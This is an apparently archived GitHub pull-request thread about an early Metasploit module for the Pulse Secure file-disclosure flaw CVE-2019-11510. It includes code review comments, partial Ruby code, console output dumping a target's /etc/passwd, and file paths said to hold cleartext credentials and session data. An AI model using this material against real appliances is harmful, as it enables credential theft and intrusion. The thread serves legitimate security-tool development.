[WIP] Module for CVE-2019-11510 - Pulse Secure File Disclosure #12220

Closed
wants to merge 7 commits into from

Conversation

@0xDezzy
Contributor

0xDezzy commented Aug 21, 2019

This is a work-in-progress exploit for CVE-2019-11510.

It grabs /etc/passwd and displays it to the terminal.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do use exploit/linux/http/pulse_secure_file_leak
  3. Do set RHOSTS [Pulse secure instance]
  4. Do run

Execution

msf5 auxiliary(linux/http/pulse_secure_file_leak) > run
[*] Running module against ***.***.***.***

[+] Checking...
[+] Target is Vulnerable!
[+] Parsing file.......
[+] root:x:0:0:root:/:/bin/bash.
[+] nfast:x:0:0:nfast:/:/bin/bash.
[+] bin:x:1:1:bin:/:.
[+] nobody:x:99:99:Nobody:/:.
[+] dns:x:98:98:DNS:/:.
[+] term:x:97:97:Telnet/SSH:/:.
[+] web80:x:96:96:Port 80 web:/:.
[+] rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin.
[+] postgres:x:102:102:PostgreSQL User:/:.
[*] Auxiliary module execution completed
0xDezzy added 2 commits Aug 21, 2019
@0xDezzy 0xDezzy changed the title 0x dezzy patch 1 [WIP] Module for CVE-2019-11510 - Pulse Secure File Disclosure Aug 21, 2019
@0xDezzy

Contributor Author

0xDezzy commented Aug 21, 2019

This can be leveraged to gain clear text credentials by grabbing /data/runtime/mtmp/lmdb/dataa/data.mdb?.

I'm working on an updated version that will allow you to grab this binary file, parse it, and show the credentials, but this is also my first Metasploit module.

@bcoles

Contributor

bcoles commented Aug 21, 2019

Please use two spaces instead of tabs for indentation. It would also be a good idea to run msftidy over your module. msftidy can be found in ./tools/dev/

Additionally, you may want to use store_loot to store the /etc/passwd file.

@0xDezzy

Contributor Author

0xDezzy commented Aug 21, 2019

Thanks! I'll go ahead and do that!

@bcoles

Contributor

bcoles commented Aug 21, 2019

Presumably files other than /etc/passwd can be retrieved? I recommend taking a look at some of the existing path traversal modules (ls -R modules | grep traversal) for sample code. Traditionally, file disclosure traversal modules offer options to set both the file path and traversal depth (grep -rn DEPTH modules for examples).

Additionally, exploit modules are expected to return a session. As this module does not return a session, it belongs in the auxiliary/http category, along with other HTTP-based traversal modules.

Also, while parsing the passwd file is a nice-to-have feature, it would be much easier to simply store the file as loot (grep -rn store_loot modules for examples). Also, please use store_loot to store the downloaded file, rather than rolling your own file storage functionality (grep -rn store_loot modules for examples).

@@ -0,0 +1,73 @@
# Quick hackish exploit for the CVE-2019-11510

@bcoles

bcoles Aug 21, 2019

Contributor

Presuming that you wish to license this module for use in Metasploit, please use the standard comment header here.

data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
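Review bot: the output filename is built from `datastore['RHOST']` and written to the current working directory, and `File.delete(filename) if File.exist?(filename)` silently discards the previous capture for the same host. `store_loot` writes under the framework's loot directory with a unique, sanitized filename, records the host and content type in the database, and is what the other traversal modules use, so the `File.exist?`/`File.delete` dance can be dropped entirely.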

@bcoles

bcoles Aug 21, 2019

Contributor

Please use store_loot rather than rolling your own file storage functionality.

end
end
end
def parse()
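Review bot: `def parse()` with empty parentheses is non-idiomatic Ruby (rubocop's Style/DefWithParentheses flags it); write `def parse`. More importantly, a method that takes no arguments has to find the data to parse in module state or on disk, which makes it impossible to test in isolation. Take the body as a parameter (`def parse(body)`) and return the parsed entries instead of printing them, so the caller decides what to print and what to hand to `store_loot`.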

@bcoles

bcoles Aug 21, 2019

Contributor

I'm not really sure what this does, but I'm fairly sure it won't work as intended, especially if the retrieved file is not ASCII.

I presume you're trying to extract the file contents from the HTTP response? Are there any delimiters you can use? This parsing looks brittle.

@bwatters-r7

Contributor

bwatters-r7 commented Aug 21, 2019

I think the sanity testing failures are unrelated to this PR:

TESTING
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
LAUNCHING C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
FAILED TO RUN C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
LAUNCHING C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
FAILED TO RUN C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe:
[Error 1392] The file or directory is corrupted and unreadable
@bcoles

Contributor

bcoles commented Aug 21, 2019

A bit late now, however, for future reference, you can use git mv to rename/move a file rather than deleting it.

@0xDezzy

Contributor Author

0xDezzy commented Aug 21, 2019

I was deleting it because I rewrote the entire thing. I will be committing it to the proper directory as well. I will keep that in mind though.

Never really made a PR before so forgive me for the mistakes.

@bwatters-r7

Contributor

bwatters-r7 commented Aug 21, 2019

@0xDezzy no worries. The only people who have never screwed up git are people who have never used git.
It looks like you deleted your changes?

Do you still want this PR open?

@0xDezzy

Contributor Author

0xDezzy commented Aug 21, 2019

Yeah, I'm going to push another commit with an updated version.

@@ -0,0 +1,112 @@
##
# This module requires Metasploit: https://Metasploit.com/download

@bcoles

bcoles Aug 23, 2019

Contributor
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
'uri' => uri
})

unless res && res.code ==200
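Review bot: missing space in `res.code ==200`; write `res.code == 200`. Beyond style, `unless res && res.code == 200` on its own treats every 200 as a successful file read, so a web server that answers 200 with an HTML error page would be reported as a successful disclosure. Add a check on `res.body` (non-empty, not markup, and shaped like the requested file) before treating the response as success.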

@bcoles

bcoles Aug 23, 2019

Contributor

It might be a good idea to perform some content checking of res.body here, as there are numerous instances where a web server may return 200 OK.

@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

Looking into it.

@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

With this exploit, if the file cannot be accessed or the filepath is invalid, it will return a 4xx error. If the content is actually returned, it will return a 200 OK.

I'm looking into how to parse the raw data and grab the specific entries of interest (cleartext credentials, session IDs, hashes, etc.) and store those in the loot.
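As an added example (not code from this PR or from the Metasploit project), here is a standalone Ruby content check of the kind bcoles asks for: a 200 OK is only treated as a successful /etc/passwd read if the body actually parses as a passwd file, and HTML error pages and binary bodies (the non-ASCII case raised on the parse method) are rejected. The sample bodies are constructed.

```ruby
# Added example, not code from the PR: validate that a 200 OK body really is
# /etc/passwd before reporting success, and parse it into entries.
PASSWD_FIELDS = 7  # name:passwd:uid:gid:gecos:home:shell

# Constructed sample bodies a web server might return with status 200.
PASSWD_SAMPLE = "root:x:0:0:root:/:/bin/bash\nnobody:x:99:99:Nobody:/:\n"
HTML_SAMPLE   = "<html><body><h1>OK</h1></body></html>\n"
BINARY_SAMPLE = "\xDE\xAD\xBE\xEF\x00\x01".b  # e.g. a chunk of an LMDB file

# True only for bytes a passwd file can legitimately contain: printable ASCII
# plus tab, LF and CR. NUL, DEL and high bytes mean "binary", not passwd.
def ascii_text?(bytes)
  bytes.all? { |b| (0x20..0x7e).cover?(b) || [0x09, 0x0a, 0x0d].include?(b) }
end

# Parses a passwd-style body into an array of hashes, or returns nil when the
# body is empty, non-ASCII, looks like markup, or any line is malformed.
def parse_passwd(body)
  return nil if body.nil? || body.empty?
  text = body.dup.force_encoding('BINARY')
  return nil unless ascii_text?(text.bytes)
  text.force_encoding('US-ASCII')
  return nil if text.lstrip.start_with?('<')  # HTML/XML page served as 200
  entries = []
  text.split(/\r?\n/).each do |line|
    next if line.empty? || line.start_with?('#')
    fields = line.split(':', -1)             # -1 keeps a trailing empty shell
    return nil unless fields.length == PASSWD_FIELDS
    return nil unless fields[2].match?(/\A\d+\z/) && fields[3].match?(/\A\d+\z/)
    entries << { name: fields[0], uid: fields[2].to_i, gid: fields[3].to_i,
                 gecos: fields[4], home: fields[5], shell: fields[6] }
  end
  entries.empty? ? nil : entries
end

# The check a module should make before printing "Target is Vulnerable!":
# the body parses and contains the root account (uid 0).
def passwd_body?(body)
  entries = parse_passwd(body)
  !entries.nil? && entries.any? { |e| e[:name] == 'root' && e[:uid] == 0 }
end

if __FILE__ == $PROGRAM_NAME
  { passwd: PASSWD_SAMPLE, html: HTML_SAMPLE, binary: BINARY_SAMPLE }.each do |label, body|
    puts "#{label}: #{passwd_body?(body) ? 'passwd file' : 'not a passwd file'}"
  end
end
```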

{
'method' => 'GET',
'uri' => uri + payload,
},1395)
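Review bot: `},1395)` passes the timeout as a bare magic number with no space after the comma (`}, 1395)`). Expose it as a module option instead (an `OptInt` registered via `register_options`, named for instance `TIMEOUT`) and pass `datastore['TIMEOUT']` here, so operators can tune it and the reason for such a long wait is documented beside the option rather than buried in a call.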

@bcoles

bcoles Aug 23, 2019

Contributor

1395 is an awfully long timeout ...

@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

I'm still trying to figure out how to download this large file in chunks.

@wvu-r7

wvu-r7 Oct 2, 2019

Contributor

Oddly specific!

data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)

@bcoles

bcoles Aug 23, 2019

Contributor

Please use store_loot.

@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

Working on it. Trying to figure out how to implement it.

0xDezzy and others added 3 commits Aug 26, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@ahahaah


ahahaah commented Sep 6, 2019

Could you add the function so that it can parse /data/runtime/mtmp/system?

@wvu-r7

Contributor

wvu-r7 commented Oct 2, 2019

Hi, @0xDezzy! Are you still working on this module? Let me know if you'd like any help. We have access to a target now.

@jmartin-r7

Contributor

jmartin-r7 commented Oct 4, 2019

@msjenkins-r7 test this please.

@wvu-r7 wvu-r7 self-assigned this Oct 10, 2019
@wvu-r7

Contributor

wvu-r7 commented Oct 30, 2019

Closing this particular PR due to inactivity. I have a rewritten module that I'll PR tonight. It should address outstanding issues and work nicely with the RCE module I wrote. Everyone will be credited for their contributions. Thank you!

@wvu-r7 wvu-r7 closed this Oct 30, 2019
@wvu-r7

Contributor

wvu-r7 commented Oct 30, 2019

Note that the long timeout (1395 seconds) waiting for the server to finish sending data (it never seems to finish) will be obsoleted by an enhancement to Rex::Proto::Http::Client that will allow returning partial responses. I'll PR that separately.
